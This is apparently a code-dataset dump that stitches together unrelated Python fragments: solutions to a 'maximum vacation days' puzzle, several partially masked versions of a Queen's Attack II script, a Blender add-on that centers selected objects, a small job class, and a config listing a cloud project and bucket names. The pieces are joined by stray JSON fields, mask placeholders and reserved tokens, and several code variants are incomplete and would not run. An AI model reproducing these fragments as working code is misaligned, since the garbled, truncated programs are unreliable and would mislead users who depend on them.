At the end, we simply want max(best), the best answer for any ending city.\n\nFor every flight i -> j (including staying in the same city, when i == j), we have a candidate answer best[j] = best[i] + days[j][t], and we want the best answer of those.\n\nWhen the graph is sparse, we can precompute flights_available[i] = [j for j, adj in enumerate(flights[i]) if adj or i == j] instead to save some time, but this is not required.\n\ndef maxVacationDays(self, flights, days):\n NINF = float('-inf')\n N, K = len(days), len(days[0])\n best = [NINF] * N\n best[0] = 0\n \n for t in xrange(K):\n cur = [NINF] * N\n for i in xrange(N):\n for j, adj in enumerate(flights[i]):\n if adj or i == j:\n cur[j] = max(cur[j], best[i] + days[j][t])\n best = cur\n return max(best)\n \n --------------------------------------------------------------------------------------\n hought process\nRecursive backtracking\n\ndef backtrack(week, city):\n\nbacktrack(week, city) = max(stay: days[city][week] + backtrack(week+1, city), fly: max(backtrack(week+1, other) + days[other][week]) for flights[city][other] == 1)\nflights can be optimized using adjacency list\nbase case: week == N, return 0\nbecause there is no state change, we can use memoization\n\nbe careful that even if working in a city all week, it can still provide more opportunites for more vacation in future (because maybe you can only fly to other city and cannot come back, but future weeks in this city may have many vacations)\n\njust try everything possible!\n\nIterative solution is also simple\n\nTop-down DP\nimport functools\n\n\nclass Solution:\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, K = len(days), len(days[0])\n flights = [[i for i, can_fly in enumerate(city) if can_fly] \n\t\t for city in flights]\n @functools.lru_cache(None)\n def backtrack(week, city):\n if week == K:\n return 0\n stay = days[city][week] + backtrack(week+1, city)\n fly = max((days[other][week] + backtrack(week+1, 
other) \n for other in flights[city]), default=0)\n return max(stay, fly)\n return backtrack(0, 0)\nBottom-up DP\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, K = len(days), len(days[0])\n flights = [[i for i, can_fly in enumerate(city) if can_fly] \n\t\t for city in flights]\n dp = [[0] * N for _ in range(K+1)]\n for week in range(K-1, -1, -1):\n for city in range(N):\n stay = days[city][week] + dp[week+1][city]\n fly = max((days[other][week] + dp[week+1][other]\n for other in flights[city]), default=0)\n dp[week][city] = max(stay, fly)\n return dp[0][0]\nO(K) space optimization\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, K = len(days), len(days[0])\n flights = [[i for i, can_fly in enumerate(city) if can_fly]\n for city in flights]\n dp = [0] * N\n cur = dp[:]\n for week in range(K-1, -1, -1):\n for city in range(N):\n stay = days[city][week] + dp[city]\n fly = max((days[other][week] + dp[other]\n for other in flights[city]), default=0)\n cur[city] = max(stay, fly)\n dp, cur = cur, dp\n return dp[0]\n \n--------------------------------------------------------------------------------\nclass Solution:\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n n = len(flights)\n nexts = collections.defaultdict(list)\n for i in range(n):\n nexts[i].append(i)\n for j in range(n):\n if flights[i][j]:\n nexts[i].append(j)\n m = len(days[0])\n minHeap = [(0,0)]\n for weeks in range(m):\n visited = set()\n temp = []\n while len(temp) < n and minHeap:\n vac,city = heapq.heappop(minHeap)\n for nxt in nexts[city]:\n if nxt not in visited:\n visited.add(nxt)\n heapq.heappush(temp,(vac-days[nxt][weeks],nxt))\n minHeap = temp\n vac,city = heapq.heappop(minHeap)\n return -vac\n \n \n \n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for _ in range(numberOfObs):
obs = input().split()
obstacle.append((int(obs[0]), int(obs[1])))
<|reserved_special_token_0|>
while 1 <= q <= board and 1 <= r <= board:
if (q, r) in obstacle:
break
else:
boxes += 1
q -= 1
while 1 <= s <= board and 1 <= t <= board:
if (s, t) in obstacle:
break
else:
boxes += 1
s += 1
while 1 <= u <= board and 1 <= v <= board:
if (u, v) in obstacle:
break
else:
boxes += 1
v -= 1
while 1 <= w <= board and 1 <= x <= board:
if (w, x) in obstacle:
break
else:
boxes += 1
x += 1
while 1 <= o <= board and 1 <= p <= board:
if (o, p) in obstacle:
break
else:
boxes += 1
o += 1
p += 1
while 1 <= m <= board and 1 <= n <= board:
if (m, n) in obstacle:
break
else:
boxes += 1
m -= 1
n -= 1
while 1 <= k <= board and 1 <= l <= board:
if (k, l) in obstacle:
break
else:
boxes += 1
k -= 1
l += 1
while 1 <= i <= board and 1 <= j <= board:
if (i, j) in obstacle:
break
else:
boxes += 1
i += 1
j -= 1
print(boxes - 8)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Queen's Attack II: count the squares a queen at (row, col) can attack
# on a `board` x `board` grid (1-based coordinates), stopping before the
# first obstacle in each of the 8 directions.
nk = input().split()
board = int(nk[0])
numberOfObs = int(nk[1])
roco = input().split()
row = int(roco[0])
col = int(roco[1])
# A set gives O(1) membership tests; the original list scan was O(k)
# per visited square.
obstacle = set()
for _ in range(numberOfObs):
    obs = input().split()
    obstacle.add((int(obs[0]), int(obs[1])))
boxes = 0
# The 8 queen directions: vertical, horizontal, and both diagonals.
for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1),
               (1, 1), (-1, -1), (-1, 1), (1, -1)):
    r, c = row, col
    # Walk outward until leaving the board or hitting an obstacle.  The
    # starting square is counted once per direction (8 times in total),
    # which the final `- 8` compensates for — same accounting as the
    # original eight copy-pasted loops.
    while 1 <= r <= board and 1 <= c <= board and (r, c) not in obstacle:
        boxes += 1
        r += dr
        c += dc
print(boxes - 8)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from math import gcd
import numpy as np
# Queen's Attack II: count the squares a queen at (row, col) can attack
# on a `board` x `board` grid (1-based coordinates), stopping before the
# first obstacle in each of the 8 directions.
nk = input().split()
board = int(nk[0])
numberOfObs = int(nk[1])
roco = input().split()
row = int(roco[0])
col = int(roco[1])
# A set gives O(1) membership tests; the original list scan was O(k)
# per visited square.
obstacle = set()
for _ in range(numberOfObs):
    obs = input().split()
    obstacle.add((int(obs[0]), int(obs[1])))
boxes = 0
# The 8 queen directions: vertical, horizontal, and both diagonals.
for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1),
               (1, 1), (-1, -1), (-1, 1), (1, -1)):
    r, c = row, col
    # Walk outward until leaving the board or hitting an obstacle.  The
    # starting square is counted once per direction (8 times in total),
    # which the final `- 8` compensates for — same accounting as the
    # original eight copy-pasted loops.
    while 1 <= r <= board and 1 <= c <= board and (r, c) not in obstacle:
        boxes += 1
        r += dr
        c += dc
print(boxes - 8)
<|reserved_special_token_1|>
'''a,b = input().split()
a, b = [int(a),int(b)]
List = set()
ArrayA = list(map(int, input().split()))
temp = 1
ArrayB = list(map(int, input().split()))
for i in range(max(ArrayA), min(ArrayB)+1):
for j in ArrayA:
if i%j is 1:
temp += 1
if temp is len(ArrayA):
List.add(i)
temp=1
newList = list(List)
temp = 1
newSet = set()
for i in newList:
for j in ArrayB:
if j%i==1:
temp+=1
if temp is len(ArrayB):
newSet.add(i)
temp=1
print(len(list(newSet)))
'''
'''nm = input().split( "-" )
a = (nm[1])
b = (nm[1])
print(nm)'''
'''x1, v1, x2, v2 = input().split()
x1, v1, x2, v2 = [int(x1),int(v1),int(x2),int(v2)]
if (x1<x2 and v1<v2) or (x2>x1 and v2>v1) or v1 is v2:
print("NO")
exit(1)
diff = 1
while True:
x1 += v1
x2 += v2
diff = x2 - x1
if diff < 1:
print("NO")
break
elif diff is 1:
print("YES")
break'''
#Graph Explaorartion
'''
import numpy as np
import matplotlib.pyplot as plt
N = 5
menMeans = (20, 35, 30, 35, 27)
menStd = (2, 3, 4, 1, 2)
ind = np.arange(N) # the x locations for the groups
width = 1.35 # the width of the bars
fig = plt.figure()
ax = fig.add_subplot(111)
rects1 = ax.bar(ind, menMeans, width, color='royalblue', yerr=menStd)
womenMeans = (25, 32, 34, 20, 25)
womenStd = (3, 5, 2, 3, 3)
rects2 = ax.bar(ind+width, womenMeans, width, color='seagreen', yerr=womenStd)
# add some
ax.set_ylabel('Scores')
ax.set_title('Scores by group and gender')
ax.set_xticks(ind + width / 2)
ax.set_xticklabels( ('G1', 'G2', 'G3', 'G4', 'G5') )
ax.legend( (rects1[1], rects2[1]), ('Men', 'Women') )
plt.show()
'''
from math import gcd
# from functools import reduce
# for _ in range(int(input())):
# N = int(input())
# print(reduce(lambda x,y: x*y//gcd(x,y), range(1,N+1)))
import numpy as np
# Queen's Attack II: count the squares a queen at (row, col) can attack
# on a `board` x `board` grid (1-based coordinates), stopping before the
# first obstacle in each of the 8 directions.
nk = input().split()
board = int(nk[0])
numberOfObs = int(nk[1])
roco = input().split()
row = int(roco[0])
col = int(roco[1])
# A set gives O(1) membership tests; the original list scan was O(k)
# per visited square.
obstacle = set()
for _ in range(numberOfObs):
    obs = input().split()
    obstacle.add((int(obs[0]), int(obs[1])))
boxes = 0
# The 8 queen directions: vertical, horizontal, and both diagonals.
for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1),
               (1, 1), (-1, -1), (-1, 1), (1, -1)):
    r, c = row, col
    # Walk outward until leaving the board or hitting an obstacle.  The
    # starting square is counted once per direction (8 times in total),
    # which the final `- 8` compensates for — same accounting as the
    # original eight copy-pasted loops.
    while 1 <= r <= board and 1 <= c <= board and (r, c) not in obstacle:
        boxes += 1
        r += dr
        c += dc
print(boxes - 8)
|
flexible
|
{
"blob_id": "73d02615863826d77d65fbf0314dc71acb97ef28",
"index": 4035,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int(obs[1])))\n<mask token>\nwhile 1 <= q <= board and 1 <= r <= board:\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile 1 <= s <= board and 1 <= t <= board:\n if (s, t) in obstacle:\n break\n else:\n boxes += 1\n s += 1\nwhile 1 <= u <= board and 1 <= v <= board:\n if (u, v) in obstacle:\n break\n else:\n boxes += 1\n v -= 1\nwhile 1 <= w <= board and 1 <= x <= board:\n if (w, x) in obstacle:\n break\n else:\n boxes += 1\n x += 1\nwhile 1 <= o <= board and 1 <= p <= board:\n if (o, p) in obstacle:\n break\n else:\n boxes += 1\n o += 1\n p += 1\nwhile 1 <= m <= board and 1 <= n <= board:\n if (m, n) in obstacle:\n break\n else:\n boxes += 1\n m -= 1\n n -= 1\nwhile 1 <= k <= board and 1 <= l <= board:\n if (k, l) in obstacle:\n break\n else:\n boxes += 1\n k -= 1\n l += 1\nwhile 1 <= i <= board and 1 <= j <= board:\n if (i, j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n",
"step-3": "<mask token>\nnk = input().split()\nboard = int(nk[0])\nnumberOfObs = int(nk[1])\nroco = input().split()\nobstacle = []\nrow = int(roco[0])\ncol = int(roco[1])\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int(obs[1])))\nq = row\nr = col\ns = row\nt = col\nu = row\nv = col\nw = row\nx = col\nk = row\nl = col\ni = row\nj = col\nm = row\nn = col\no = row\np = col\nboxes = 0\nwhile 1 <= q <= board and 1 <= r <= board:\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile 1 <= s <= board and 1 <= t <= board:\n if (s, t) in obstacle:\n break\n else:\n boxes += 1\n s += 1\nwhile 1 <= u <= board and 1 <= v <= board:\n if (u, v) in obstacle:\n break\n else:\n boxes += 1\n v -= 1\nwhile 1 <= w <= board and 1 <= x <= board:\n if (w, x) in obstacle:\n break\n else:\n boxes += 1\n x += 1\nwhile 1 <= o <= board and 1 <= p <= board:\n if (o, p) in obstacle:\n break\n else:\n boxes += 1\n o += 1\n p += 1\nwhile 1 <= m <= board and 1 <= n <= board:\n if (m, n) in obstacle:\n break\n else:\n boxes += 1\n m -= 1\n n -= 1\nwhile 1 <= k <= board and 1 <= l <= board:\n if (k, l) in obstacle:\n break\n else:\n boxes += 1\n k -= 1\n l += 1\nwhile 1 <= i <= board and 1 <= j <= board:\n if (i, j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n",
"step-4": "<mask token>\nfrom math import gcd\nimport numpy as np\nnk = input().split()\nboard = int(nk[0])\nnumberOfObs = int(nk[1])\nroco = input().split()\nobstacle = []\nrow = int(roco[0])\ncol = int(roco[1])\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int(obs[1])))\nq = row\nr = col\ns = row\nt = col\nu = row\nv = col\nw = row\nx = col\nk = row\nl = col\ni = row\nj = col\nm = row\nn = col\no = row\np = col\nboxes = 0\nwhile 1 <= q <= board and 1 <= r <= board:\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile 1 <= s <= board and 1 <= t <= board:\n if (s, t) in obstacle:\n break\n else:\n boxes += 1\n s += 1\nwhile 1 <= u <= board and 1 <= v <= board:\n if (u, v) in obstacle:\n break\n else:\n boxes += 1\n v -= 1\nwhile 1 <= w <= board and 1 <= x <= board:\n if (w, x) in obstacle:\n break\n else:\n boxes += 1\n x += 1\nwhile 1 <= o <= board and 1 <= p <= board:\n if (o, p) in obstacle:\n break\n else:\n boxes += 1\n o += 1\n p += 1\nwhile 1 <= m <= board and 1 <= n <= board:\n if (m, n) in obstacle:\n break\n else:\n boxes += 1\n m -= 1\n n -= 1\nwhile 1 <= k <= board and 1 <= l <= board:\n if (k, l) in obstacle:\n break\n else:\n boxes += 1\n k -= 1\n l += 1\nwhile 1 <= i <= board and 1 <= j <= board:\n if (i, j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n",
"step-5": "'''a,b = input().split()\na, b = [int(a),int(b)]\nList = set()\nArrayA = list(map(int, input().split()))\ntemp = 1\nArrayB = list(map(int, input().split()))\nfor i in range(max(ArrayA), min(ArrayB)+1):\n for j in ArrayA:\n if i%j is 1:\n temp += 1\n\n if temp is len(ArrayA):\n List.add(i)\n temp=1\nnewList = list(List)\ntemp = 1\nnewSet = set()\nfor i in newList:\n for j in ArrayB:\n if j%i==1:\n temp+=1\n if temp is len(ArrayB):\n newSet.add(i)\n temp=1\n\nprint(len(list(newSet)))\n'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''nm = input().split( \"-\" )\na = (nm[1])\nb = (nm[1])\nprint(nm)'''\n\n\n\n\n\n\n\n'''x1, v1, x2, v2 = input().split()\nx1, v1, x2, v2 = [int(x1),int(v1),int(x2),int(v2)]\nif (x1<x2 and v1<v2) or (x2>x1 and v2>v1) or v1 is v2:\n print(\"NO\")\n exit(1)\ndiff = 1\nwhile True:\n x1 += v1\n x2 += v2\n diff = x2 - x1\n if diff < 1:\n print(\"NO\")\n break\n elif diff is 1:\n print(\"YES\")\n break'''\n#Graph Explaorartion\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nN = 5\nmenMeans = (20, 35, 30, 35, 27)\nmenStd = (2, 3, 4, 1, 2)\n\nind = np.arange(N) # the x locations for the groups\nwidth = 1.35 # the width of the bars\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nrects1 = ax.bar(ind, menMeans, width, color='royalblue', yerr=menStd)\n\nwomenMeans = (25, 32, 34, 20, 25)\nwomenStd = (3, 5, 2, 3, 3)\nrects2 = ax.bar(ind+width, womenMeans, width, color='seagreen', yerr=womenStd)\n\n# add some\nax.set_ylabel('Scores')\nax.set_title('Scores by group and gender')\nax.set_xticks(ind + width / 2)\nax.set_xticklabels( ('G1', 'G2', 'G3', 'G4', 'G5') )\n\nax.legend( (rects1[1], rects2[1]), ('Men', 'Women') )\n\nplt.show()\n'''\nfrom math import gcd\n# from functools import reduce\n\n# for _ in range(int(input())):\n# N = int(input())\n# print(reduce(lambda x,y: x*y//gcd(x,y), range(1,N+1)))\nimport numpy as np\nnk = input().split()\nboard = int(nk[0])\nnumberOfObs = int(nk[1])\nroco = input().split()\nobstacle = []\nrow = 
int(roco[0])\ncol = int(roco[1])\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int((obs[1]))))\n#up\nq = row\nr = col\n#down\ns = row\nt = col\n#left\nu = row\nv = col\n#right\nw = row\nx = col\n#upper right\nk = row\nl = col\n#lower left\ni = row\nj = col\n#upperleft\nm = row\nn = col\n#lower right\no = row\np = col\nboxes = 0\nwhile (1 <= q <= board) and (1 <= r <= board):\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile (1 <= s <= board) and (1 <= t <= board):\n if (s, t) in obstacle:\n break\n else:\n\n\n boxes += 1\n s += 1\nwhile (1 <= u <= board) and (1 <= v <= board):\n if (u, v) in obstacle:\n break\n else:\n\n boxes += 1\n v -= 1\nwhile (1 <= w <= board) and (1 <= x <= board):\n if (w, x) in obstacle:\n break\n else:\n\n boxes += 1\n x += 1\nwhile (1 <= o <= board) and (1 <= p <= board):\n if (o, p) in obstacle:\n break\n else:\n\n boxes += 1\n o += 1\n p += 1\nwhile (1 <= m <= board) and (1 <= n <= board):\n if (m, n) in obstacle:\n break\n else:\n\n boxes += 1\n m -= 1\n n -= 1\nwhile (1 <= k <= board) and (1 <= l <= board):\n if (k, l) in obstacle:\n break\n else:\n\n boxes += 1\n k -= 1\n l += 1\nwhile (1 <= i <=board) and (1 <= j <= board):\n if (i,j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import bpy
bl_info = {
"name": "Ratchets Center All Objects",
"author": "Ratchet3789",
"version": (0, 1, 0),
"description": "Centers all selected objects. Built for Game Development.",
"category": "Object",
}
class CenterOriginToZero(bpy.types.Operator):
    """Center all objects script"""  # Blender shows this docstring as the UI tooltip.
    bl_idname = "object.center_all_in_level"  # unique identifier referenced by buttons/menus
    bl_label = "Center Origin (Zero)"  # name displayed in the interface
    bl_options = {'REGISTER', 'UNDO'}  # make the operator undoable

    def execute(self, context):
        # Move every currently selected object to the world origin.
        origin = (0, 0, 0)
        for obj in bpy.context.selected_objects:
            obj.location = origin
        # Tell Blender the operator completed successfully.
        return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
    """ABSOLUTE Zero of all objects within the scene"""
    bl_idname = "object.snap_to_origin"
    bl_label = "Center Mesh (Zero)"
    bl_options = {'REGISTER', 'UNDO'}  # enable undo for the operator.

    def execute(self, context):
        # Snap each selected object's origin to its geometry.
        # NOTE(review): `origin_set` acts on the whole current selection,
        # so calling it inside the loop repeats the same operation once
        # per object — presumably harmless but redundant; confirm before
        # simplifying.
        for x in bpy.context.selected_objects:
            # `x.select = True` is the pre-2.8 selection API (2.8+ uses
            # `select_set`); the object is already in selected_objects, so
            # this looks like a no-op — TODO confirm target Blender version.
            x.select = True
            bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
        return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
    """ABSOLUTE Zero of all objects within the scene"""
    bl_idname = "object.absolute_center_all_in_level"
    bl_label = "Center All (Zero)"
    bl_options = {'REGISTER', 'UNDO'}  # enable undo for the operator.

    def execute(self, context):
        # For each selected object: snap its origin to its geometry, then
        # move the object to the world origin — combining the two sibling
        # operators above.
        # NOTE(review): `origin_set` acts on the whole selection, so the
        # per-object call is redundant (see SnapMeshToOrigin) — confirm
        # before simplifying.
        for x in bpy.context.selected_objects:
            # Pre-2.8 selection API; object is already selected here —
            # TODO confirm target Blender version.
            x.select = True
            bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
            x.location = (0, 0, 0)
        return {'FINISHED'}
def register():
    """Register this add-on's operator classes with Blender."""
    for cls in (CenterOriginToZero, SnapMeshToOrigin, AbsoluteCenterObjects):
        bpy.utils.register_class(cls)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
# This allows you to run the script directly from blenders text editor
# to test the addon without having to install it.
if __name__ == "__main__":
register()
|
normal
|
{
"blob_id": "f7a511beaea869cf32eb905a4f3685077297a5ec",
"index": 1654,
"step-1": "<mask token>\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\"\n bl_idname = 'object.center_all_in_level'\n bl_label = 'Center Origin (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\n\ndef unregister():\n bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\"\n bl_idname = 'object.center_all_in_level'\n bl_label = 'Center Origin (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\n\ndef unregister():\n bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n\nif __name__ == '__main__':\n register()\n",
"step-4": "<mask token>\nbl_info = {'name': 'Ratchets Center All Objects', 'author': 'Ratchet3789',\n 'version': (0, 1, 0), 'description':\n 'Centers all selected objects. Built for Game Development.', 'category':\n 'Object'}\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\"\n bl_idname = 'object.center_all_in_level'\n bl_label = 'Center Origin (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\n\ndef unregister():\n bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n\nif __name__ == '__main__':\n register()\n",
"step-5": "import bpy\nbl_info = {\n \"name\": \"Ratchets Center All Objects\",\n \"author\": \"Ratchet3789\",\n \"version\": (0, 1, 0),\n \"description\": \"Centers all selected objects. Built for Game Development.\",\n \"category\": \"Object\",\n}\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\" # blender will use this as a tooltip for menu items and buttons.\n bl_idname = \"object.center_all_in_level\" # unique identifier for buttons and menu items to reference.\n bl_label = \"Center Origin (Zero)\"\t\t\t# display name in the interface.\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n # execute() is called by blender when running the operator.\n def execute(self, context):\n\n # The original script\n for x in bpy.context.selected_objects:\n x.location = (0, 0, 0)\n # this lets blender know the operator finished successfully.\n return {'FINISHED'}\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = \"object.snap_to_origin\"\n bl_label = \"Center Mesh (Zero)\"\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n def execute(self, context):\n \n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type=\"GEOMETRY_ORIGIN\")\n return {'FINISHED'}\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = \"object.absolute_center_all_in_level\"\n bl_label = \"Center All (Zero)\"\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type=\"GEOMETRY_ORIGIN\")\n x.location = (0, 0, 0)\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\ndef unregister():\n 
bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n# This allows you to run the script directly from blenders text editor\n# to test the addon without having to install it.\nif __name__ == \"__main__\":\n register()\n",
"step-ids": [
10,
14,
15,
16,
18
]
}
|
[
10,
14,
15,
16,
18
] |
class Job:
def __init__(self, id, duration, tickets):
self.id = id
self.duration = duration
self.tickets = tickets
def run(self, time_slice):
self.duration -= time_slice
def done(self):
return self.duration <= 0
|
normal
|
{
"blob_id": "cf7bd8aa9c92d1c3acb9ccc1658d66fa0e7a142d",
"index": 3777,
"step-1": "class Job:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Job:\n <mask token>\n\n def run(self, time_slice):\n self.duration -= time_slice\n <mask token>\n",
"step-3": "class Job:\n <mask token>\n\n def run(self, time_slice):\n self.duration -= time_slice\n\n def done(self):\n return self.duration <= 0\n",
"step-4": "class Job:\n\n def __init__(self, id, duration, tickets):\n self.id = id\n self.duration = duration\n self.tickets = tickets\n\n def run(self, time_slice):\n self.duration -= time_slice\n\n def done(self):\n return self.duration <= 0\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
PROJECT_ID = 'aaet-geoscience-dev'
DATA_PATH = '/home/airflow/gcs/data/tmp'
CREDENTIALS_JSON = 'keys/composer_las_merge.json'
BUCKET_LAS_MERGE = 'las_merged'
